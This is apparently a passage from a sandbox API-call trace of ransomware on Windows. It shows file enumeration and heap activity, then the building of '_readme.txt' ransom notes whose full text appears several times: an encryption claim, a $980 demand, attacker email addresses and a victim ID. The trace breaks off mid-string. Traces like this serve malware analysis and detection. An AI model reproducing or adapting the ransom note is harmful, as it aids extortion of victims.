ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.996] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38464a0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.996] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38464a0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe38464a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe38464a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.996] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.996] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.002] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0128.002] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.002] PathFindFileNameW (pszPath="") returned="" [0128.002] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.002] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0128.003] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0128.004] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.004] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail 